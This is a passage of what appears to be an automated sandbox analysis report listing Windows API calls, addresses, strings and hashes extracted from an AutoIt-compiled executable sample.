                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006E5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006E5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 006E5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006E5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006E555E
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • API String ID: 2833360925-0
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006D8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006D8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006D8621
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006D8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006D863E
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • API String ID: 44706859-0
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006D8669
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006D8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006D8682
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006D8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006D869F
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • API String ID: 44706859-0
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 006DC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 006DC6D1
                    • MessageBeep.USER32(00000000), ref: 006DC6E9
                    • KillTimer.USER32(?,0000040A), ref: 006DC705
                    • EndDialog.USER32(?,00000001), ref: 006DC71F
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • API String ID: 3741023627-0
                    APIs
                    • EndPath.GDI32(?), ref: 006813BF
                    • StrokeAndFillPath.GDI32(?,?,006BBAD8,00000000,?), ref: 006813DB
                    • SelectObject.GDI32(?,00000000), ref: 006813EE
                    • DeleteObject.GDI32 ref: 00681401
                    • StrokePath.GDI32(?), ref: 0068141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: 8d56c0719dad1775eacabe662c518bd2531bd11bcb44200ab17482f979749fe5
                    • Instruction ID: b86385afae908935521eea7e95e6707b00d5a589075705f325700595aa33e221
                    • Opcode Fuzzy Hash: 8d56c0719dad1775eacabe662c518bd2531bd11bcb44200ab17482f979749fe5
                    • Instruction Fuzzy Hash: D9F0E174004308DBDB216F16EC0C7543FADA703326F04C326E429495F1C73949A6DF59
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 006EC69D
                    • CoCreateInstance.OLE32(00712D6C,00000000,00000001,00712BDC,?), ref: 006EC6B5
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • CoUninitialize.OLE32 ref: 006EC922
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 35ee54a98bea009b05d0b0829e70b5ebe6d5bc62d7481ab72bf143c25d32e4be
                    • Instruction ID: ecfd39d162f925eb8de4e7009b96e5d322fcd736da54becb775895a88c82b15d
                    • Opcode Fuzzy Hash: 35ee54a98bea009b05d0b0829e70b5ebe6d5bc62d7481ab72bf143c25d32e4be
                    • Instruction Fuzzy Hash: 24A13B71108305AFD344FF54C881EABB7E9EF98704F044A1CF19697292DB70EA49CB66
                    APIs
                      • Part of subcall function 006A0FF6: std::exception::exception.LIBCMT ref: 006A102C
                      • Part of subcall function 006A0FF6: __CxxThrowException@8.LIBCMT ref: 006A1041
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 00687BB1: _memmove.LIBCMT ref: 00687C0B
                    • __swprintf.LIBCMT ref: 0069302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00692EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: 7bd18bcbdf2e4b88822bfc0fbd4750415e42b7ab4a2bb42505d14e00ef15e1fc
                    • Instruction ID: d326c783ed7c4bb5735293d3126e9246ac792d50ab21ab40800502b143115a61
                    • Opcode Fuzzy Hash: 7bd18bcbdf2e4b88822bfc0fbd4750415e42b7ab4a2bb42505d14e00ef15e1fc
                    • Instruction Fuzzy Hash: 0D918C711083119FCB68FF24D885DBEB7AAEF85740F04491DF4929B2A1DB20EE45CB5A
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 006DB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container$%q
                    • API String ID: 3565006973-3580070396
                    • Opcode ID: 57cd93db78881ecb8fc6cf2f709a140b127dcd6fdd2eab31a0b2892c7d60f158
                    • Instruction ID: 47d10913e17e1d47b0ebd072441a79e23f8fa7908cf76c4ddbb41b6922b4841c
                    • Opcode Fuzzy Hash: 57cd93db78881ecb8fc6cf2f709a140b127dcd6fdd2eab31a0b2892c7d60f158
                    • Instruction Fuzzy Hash: 6E915A70A00201DFDB64DF28C884AAAB7EAFF49710F15956EF94ACB795DB70E841CB50
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 006A52DD
                      • Part of subcall function 006B0340: __87except.LIBCMT ref: 006B037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 5fceed61d04e957787e79deb79337a047c2b448d86fe84dfbe0e34a8af0a83f3
                    • Instruction ID: cb6bd31e040f21534e5e532270a81af1ead8e0ec43172b53da628a5c15fb555b
                    • Opcode Fuzzy Hash: 5fceed61d04e957787e79deb79337a047c2b448d86fe84dfbe0e34a8af0a83f3
                    • Instruction Fuzzy Hash: 0A515CA1A08601C6EB14F718C9413EF2FD69B41750F208958E497413D5EF78CDD4DF99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: e62f6cfbbc5f4029655789433095f27f719eed0bc22c005e3437e2aebb3e4675
                    • Instruction ID: d9f67079b8349fb596984f151e27b23a4c4753725432fb6b2f9a8016817e3f61
                    • Opcode Fuzzy Hash: e62f6cfbbc5f4029655789433095f27f719eed0bc22c005e3437e2aebb3e4675
                    • Instruction Fuzzy Hash: 81512135904246DFDF25AF28C488AFA7BA7EF1A310F144056E8929B7A0D734DD42CB75
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oai
                    • API String ID: 2620147621-3423572213
                    • Opcode ID: 0e96f3b33329dae4fdc3c7955f177cf53bf2ef41c4e655c2e79f68a718b2ad16
                    • Instruction ID: b14719224daed73df48baa02ecf45f78df9d43065fa4eb017caed2211ea5be06
                    • Opcode Fuzzy Hash: 0e96f3b33329dae4fdc3c7955f177cf53bf2ef41c4e655c2e79f68a718b2ad16
                    • Instruction Fuzzy Hash: 84514A716083519FDB64CF28C851B6BBBEAEF89314F05492DE98987351DB31EA01CF92
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: 2699012bbd84faa9bbe9ca63e89676dfb3d8219937521145643d4edab074a699
                    • Instruction ID: 37e2f50d8993ad70209c4355be0ee33f4a36eb4d4da4087f75c41cddc67cfa16
                    • Opcode Fuzzy Hash: 2699012bbd84faa9bbe9ca63e89676dfb3d8219937521145643d4edab074a699
                    • Instruction Fuzzy Hash: F351B271900709DBDB24CFA5C8817EABBFAEF04714F20856EE64ACB741E7759985CB80
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007076D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007076E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00707708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 252e3362043c8999bfae93127b6aad6f1045c310bdeb993f640ffa12aa404b7c
                    • Instruction ID: c1968252ccc410afd6ca849e6eea13f4fbba976a60b66659a9e0528e8022375f
                    • Opcode Fuzzy Hash: 252e3362043c8999bfae93127b6aad6f1045c310bdeb993f640ffa12aa404b7c
                    • Instruction Fuzzy Hash: DC219F32500219EBDF25CEA4CC46FEA3BA9EF48754F110214FE156B1D0DABAB851CBA0
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00706FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00706FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00706FDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 073883a9621dfcb3af5777ebfc699afee5dc557c810a2d746979ac06efb70227
                    • Instruction ID: 1fea3150ce103381770642f5bd6d27893412c9aaf5969aa6d31a36755596ecd4
                    • Opcode Fuzzy Hash: 073883a9621dfcb3af5777ebfc699afee5dc557c810a2d746979ac06efb70227
                    • Instruction Fuzzy Hash: 49219532610119FFDF119F54DC85FAB37EAEF89754F018224FA149B1D0CA75AC6287A0
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007079E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007079F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00707A03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: fc43d0d053f832d99bdc4604a0b0589a9bfcd0c510c9e4a17a58ee5e6ebf32f8
                    • Instruction ID: 89b003ed8d6555501484392bdf7b8e161fc4c617217cf25535d6b7fc6abe9b4e
                    • Opcode Fuzzy Hash: fc43d0d053f832d99bdc4604a0b0589a9bfcd0c510c9e4a17a58ee5e6ebf32f8
                    • Instruction Fuzzy Hash: 8211E372654208FAEF249F74CC05FAB37A9EF89B64F014619FA41A60D0D676A811CB60
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00683C26,007462F8,?,?,?), ref: 00690ACE
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • _wcscat.LIBCMT ref: 006C50E1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FullNamePath_memmove_wcscat
                    • String ID: X<$ct
                    • API String ID: 257928180-3612926602
                    • Opcode ID: 6c5a2194893f4e7b376924f921c5575c65cafb88a698358f915969774e951d0a
                    • Instruction ID: 2d70de173ba774536c7390fb2652a7757e0ef816cfa9b0dc41ec8054376b7a6e
                    • Opcode Fuzzy Hash: 6c5a2194893f4e7b376924f921c5575c65cafb88a698358f915969774e951d0a
                    • Instruction Fuzzy Hash: E411A135A042089ECF90FBA4CC01ED973FEEF09350B1041A9B94CD7685EB74EB868B19
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00684C2E), ref: 00684CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00684CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: e69cdb594adf658b1cc6309ba32a883533499e2c07f186504ce76c0f29f50fbe
                    • Instruction ID: ac7585737b16e6c1e1505d8a05cbd6c7a5ed90893dbb7f663f235a8561a0903f
                    • Opcode Fuzzy Hash: e69cdb594adf658b1cc6309ba32a883533499e2c07f186504ce76c0f29f50fbe
                    • Instruction Fuzzy Hash: 39D017B0511727CFD730AF31DA18A4676EAAF05791B11CA3AD886D6A90EA78D880CB50
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00684D2E,?,00684F4F,?,007462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00684D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00684D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: 59793315a6f675a7715deddd86d2a76663ca2f4f34fed2c9ea0ab38ff01d9259
                    • Instruction ID: 954ec9cdff32f2d30f3ba40b5d09e4ec32d3a37ee737dd459159b66e56df0a8d
                    • Opcode Fuzzy Hash: 59793315a6f675a7715deddd86d2a76663ca2f4f34fed2c9ea0ab38ff01d9259
                    • Instruction Fuzzy Hash: 87D017B0550717CFD730AF31D80865676EABF15352B11CE3AD886D6B90EA78D880CB50
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00684CE1,?), ref: 00684DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00684DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: 596797151858be364ddb352878b4d9d1e1b4dab170018a3896695587627311cd
                    • Instruction ID: 8d1ab26cee2f7bc41937e33b765c7405fe471ee7501f96eee19eb58d5f0425b4
                    • Opcode Fuzzy Hash: 596797151858be364ddb352878b4d9d1e1b4dab170018a3896695587627311cd
                    • Instruction Fuzzy Hash: F8D017B1550717CFD730AF31D808A8676E6AF09355B11CA3AD8C6D6A90EB78D880CB50
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,007012C1), ref: 00701080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00701092
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 0292632b9f6e86c51ba8b2a18d75bff7d9946c8c9aef3e5444cac98edf4b9a52
                    • Instruction ID: 9ce4f62413c57a907e6982cba6cef4af32876e3a2770308e3758ead23d900423
                    • Opcode Fuzzy Hash: 0292632b9f6e86c51ba8b2a18d75bff7d9946c8c9aef3e5444cac98edf4b9a52
                    • Instruction Fuzzy Hash: A7D01770510716CFE7309F35E818A1B76E4AF09361F11CE3AE8CADA590EB78C8C0CA50
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,006F9009,?,0070F910), ref: 006F9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006F9415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: b64c31e8e25c358afd9b10a2a7e2fae31392f10a0caba92f606d9835efccdad3
                    • Instruction ID: 061c2f78b87ede01b4b5e85f7208d0b3f958b90cb14a237508fd2e2547d25b55
                    • Opcode Fuzzy Hash: b64c31e8e25c358afd9b10a2a7e2fae31392f10a0caba92f606d9835efccdad3
                    • Instruction Fuzzy Hash: 64D0C7B050071BCFDB318F31C90825272E6BF16341B00C83AE482C2A90EA78C8C0CA60
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 006FE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 006FE415
                      • Part of subcall function 006FDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006FDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 006FE615
                    • _memmove.LIBCMT ref: 006FE628
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: c03770580db2fa32980190a2a7789ffd2652e516457b96bdcec23613eee95c4d
                    • Instruction ID: c7767cc11f022f687a801d9dcdff7641e954ed52139113e737010e51fff2df91
                    • Opcode Fuzzy Hash: c03770580db2fa32980190a2a7789ffd2652e516457b96bdcec23613eee95c4d
                    • Instruction Fuzzy Hash: 0BC17B716083058FC754DF28C48096ABBE6FF89714F14896EF9999B361D732E906CF82
                    APIs
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
